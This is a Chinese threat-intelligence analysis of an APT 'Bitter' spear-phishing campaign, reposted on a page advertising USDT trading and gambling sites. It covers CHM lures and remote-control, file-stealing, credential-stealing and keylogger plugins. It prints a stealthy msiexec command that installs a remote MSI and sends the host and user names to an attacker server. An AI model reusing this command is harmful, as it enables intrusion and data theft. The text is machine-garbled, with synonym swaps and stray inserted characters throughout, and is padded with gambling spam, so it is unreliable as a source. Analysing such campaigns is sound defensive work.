USDT交易所

www.usdt8.vip),全球頂尖的USDT場外擔保交易平臺。

,

1、概述

近期,安天CERT在梳理平安事宜时,发现一批针对我国军工、商业和能源等领域的网络攻击流动。攻击手法存在伪造身份向目的发送鱼叉邮件,投递恶意附件诱导受害者运行。经归因剖析发现,这批流动具备APT组织“苦象”[1]的历史特征,且在针对目的、恶意代码和网络资产等层面均存在关联,属于“苦象”组织在2021年上半年的典型攻击模式。相关攻击流动的特征总结如下:

表1-1 攻击流动特征

此外,安天CERT还跟踪、关联到“苦象”组织上半年{nian}使用过的多个窃密插件,其攻击手艺和代码功效均带有该组织的显著特征,在关联剖析章节我们将对asms和sthost两个典型插件举行剖析。

2、事宜剖析

2.1 初始诱「you」饵剖析

攻击者会以“集会议程”等邮件主题,伪造受害者可能感兴趣的发件人向目的延续投递多封鱼叉邮件,邮件附件中包罗恶意的CHM文件,案例如图:

图2-1 附件压缩包中的内容

表2-1 样本标签

“集会议程.chm”为包罗恶意剧本的Windows辅助文件,静态属性皆不能用,点击执行后看到的正文为空缺:

图2-2 CHM文件的正文及属性

现在,其含有的经混淆的恶意剧本被自动运行,作用是添加一个每15分钟运行一次的系统义务设计:

图2-3 CHM文档包罗的恶意剧本

义务设计名为“DefenderService”,操作工具为以msiexec下令运行远程的MSI文件,历程完全静默且不重启系统,同时提交本机的主机名和用户名:

%coMSPec% /c start /min msiexec /i http://***.com/***/crt.php?h=%computername%*%username% /qn /norestart

攻击者疑似会针对目的选择性下发CERT.msi的文件内容。CERT.msi认真向以下目录释放下载器模块winupd.exe,下载器模块功效是从C2服务器获取一系列的功效插件,保留在统一目录下:

C:\Users\***\AppData\Roaming\Microsoft\Windows\SendTo\

在考察到的案例中,陆续功效插件的选取和部署历程约在半小时内完成【cheng】。

表2-2恶意文件信息列表

2.2 部署插件剖析

远控插件1:

插件『jian』名称:MtMpEnq.exe

MD5: EF099D5FE4075132BF3812C9D5FFA8F9

功效简介:该样本是一个远控。主要功效是对文件举行浏览、传输。也可以执行cmd下令。

C2地址为45.11.***.***,端口34318:

图2-4 远控插件1硬编码的C2

表2-3 远控插件1控制指令

远控插件2:

插件名称:mtAdvanced4.exe

MD5: BD054C4F43808EF37352F36129BF0C3D

功效简介:该样本是一个远控。主要功效是对文件举行浏览、传输。也可以执行cmd下令。

C2地址为45.11.***.***,端口80:

图2-5 远控插件2硬编码的C2

表2-4 远控插件2控制指令

文件窃取插件:

插件名称:sysmgr.exe

MD5: ade9a4ee3acbb0e6b42fb57f118dbd6b

功效简介:窃取本《ben》机文件,将文件数据POST回攻击者服务器。

选取以下后缀的文件:

表2-5 指定的文件窃取工具

C2:http://***.net/UihbywscTZ/45Ugty845nv7rt.php,80端口

图2-6 文件窃密插件的上传流量

浏览器凭证窃密插件:

插件名称:mvrs_crsh.exe

MD5: 7ABCCA95BC9C69D93BE133F6597717C0

功效简介:获取火狐和谷歌浏览器保留的用户名和密码,保留在文件“en-GB-4-0.txt”。

图2-7 浏览器窃密插件的窃取工具

键盘纪录插件:

插件名称:scvhost.exe

MD5: 578918166854037CDCF1BB3A06A7A4F3

功效简介:该程序被加入系统注册表中的【de】Run启动项,用于纪录目的机械上的按键行为,并将按键信息先写入暂且缓冲文件“syslog0812AXbcW.tean”,然后汇入最终的存储文件“syslog0812AXbcW.neat ”。.neat 文件中的数据最终会被攻击者下发的文件窃取类插件如sysmgr.exe征采并上传。

注册键盘钩子,纪录按键:

图2-8 击键窃密插件的按键纪录功效

检测到“ctrl+v”后读取剪贴板内容:

图2-9 击键窃密插件的剪贴板纪录功效

将监控到的按键信息写入文件“syslog0812AXbcW.tean”:

图2-10 击键窃密插件的数据保留位置

纪录文件加密方式为每个字节加0x14(解密时每个字节省0x14):

图2-11 击键窃密插件的数据加密方式

3、关联剖析

欧博亚洲手机版下载

欢迎进入欧博亚洲手机版下载(www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

安天CERT通过代码特点、手艺手法和向量特征等手艺举行关联剖析,发现“苦象”组织使用过的数个功效插件,其中多数用于在目的机械上举行窃密作业。本章披露的asms和sthost插件与2.2章节提及的文件窃密插(cha)件sysmgr.exe在功效代码设计上十分相近,攻击者以相同逻辑实现类似的文件筛选、过滤、纪录等窃密功效,在规避检测方面也使用十分相同的手艺方式。

3.1 asms插件剖析

表3-1 窃密样本标签

该插件是“苦象”组织窃守信息的木马,其主要功效为窃取主(zhu)机硬盘驱动器中doc、docx、ppt、pptx、xls、pdf、zip、txt以及apk等类型的文件,同时该窃密木马还会探测主机是否存在光盘驱动器,若是存在,则将光盘驱动器中存在的所有文件也《ye》回传至攻击的服务器。

当木马在主机中运行时,首先会举行休眠操作〖zuo〗,休眠的秒数由其自身随机天生,休眠的目的是为了逃避沙箱的检测。

图3-1 随机休眠3

休眠完成“cheng”后,木马会在自身所在目录下建扬名为“errore.log”、“error1log.txt”的文件,error1log.txt文件作用是储存后续网络的文件『jian』信息,而errore.log文件〖jian〗作用是对自身的操作举行标识。

图3-2 确立errore.log

图3-3 确立error1log.txt

上述文件确立完成后,木马最先网络主机中不在清扫路径列表且相符类型的文件信息,包罗文件的完整路径以及文件的确立时间戳。同时,当木马探测到主机中存在光盘驱动器时,木马也会网络光盘驱动器中存在的文件。网络信息完成后,木马则会将网络的文件信息以“确立时【shi】间戳_文件路径||” 的形式写入error1log.txt。

图3-4 攻击者需要网络的类型

图3-5 需要清扫的路径

图3-6 网络文件信息

图3-7 搜索指定类型文件

图3-8 将网络的信息写入error1log.txt

图3-9 error1log.txt文件内 nei[容

完成网络信息操作后,木马会在当前目录下确立cachex86.tmp,cachex86.tmp的作用是存储由38位随机字符加机械名形成唯一标识符,标识符的作用在于后续回传窃取的信息时对受害主机举行区分。

图3-10 将标识符写入cachex86.tmp文件

图3-11 cachex64.tmp

最后,木马会将存储文件信息的error1log.txt以及网络的文件以不加 jia[密的方式回传至攻击者的C2服务器。

图3-12 回传网络的信息

图3-13 回传error1log.txt的流量

图3-14 回传文件的流量

3.2 sthost插件剖析

表3-2 窃密样本标签

该插件为窃密类木马,时间戳经由伪造,内部字符串等信息使用AES加密,运行后解密使用。样本会网络主机基本信息回传,网络指定后缀文件路径并纪录到文本,然后凭证{zheng}关注的重点路径和文件修改时间举行筛选,最后对筛【shai】选的文件举行回传。

样本在主函数中首先对加密字符串举行解密,其加密字符串首先将空格替换成加号,举行base64解码,随后行使内置密码通过使用基于HMACSHA1的伪随机数天生器,实现基于密码的密钥派生,天生AES算法密钥和初始化(hua)向量,最终解 jie[密字符串,解密算法如下所示:

图3-15 字符串解密

解密出的字符串如下所示:

图3-16 解密效果

样本解密字符串后,进入无限循环,用于获取指定系统信息与文〖wen〗件信息并回传,而且每“mei”次获取回传都市距离较长时间:

图3-17 获守信息回传

回传的系统信息经由简朴的凯撒加密,算法如下所示:

图3-18 系统信息加密

在获守信息时,样本自界说了一个Listing的类用于文件信息网络功效,该类初始化效果如下:9

图3-19 信息网络Listing类

其中RequiredExtension为需要网络的文件后缀,BlacklistFolder为无需遍历的文件夹名称。最后天生的文件内容花样为“文件路径|ddMMyyyy|HHmmss”,实验环境中如下所示:

图3-20 网络的信息内容和花样

该类还实现了通过文件最后修改时间(100天内)和文件路径举行筛选的功效。

图3-21 凭证最后写入时间举行分类

图3-22 凭证路径举行筛选

最终将筛选出的文件举行上传:

图3-23 上传文件

4、威胁框架视角的攻击映射

本次系列攻击流动共涉及ATT&CK框架中10个阶段的18个手艺点,详细行为形貌如下表:

表4-1 近期“苦象”组织攻击流动的手艺行为形貌表

将涉及到的威胁行为手艺点映射到ATT&CK框架如下图所示:

图4-1 近期“苦象”组织“zhi”攻击流动对应ATT&CK映射图

附录:参考毗〖pi〗邻

[1] “苦象”组织近期网络攻击流动及泄露武器剖析

https://www.antiy.com/response/20200917.html

USDT官方接口声明:该文看法仅代表作者自己,与本平台无关。转载请注明:欧博亚洲手机版下载(www.aLLbetgame.us):“苦象”组织上半年针对我国的攻击流动剖析
发布评论

分享到:

usdt在线交易(www.caibao.it):猜猜看,在A股史上5次大震荡期买新基的人,最高可以赚几倍?
2 条回复
  1. 新2网址大全
    新2网址大全
    (2021-07-14 00:10:44) 1#

    不知道说啥,给大家拜年

  2. 新2代理网址
    新2代理网址
    (2021-08-05 00:01:24) 2#

    希望叶童和赵雅芝都能安享晚年吧。
    转载说明:本文转载自USDT生意平台。每天下班都看的

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。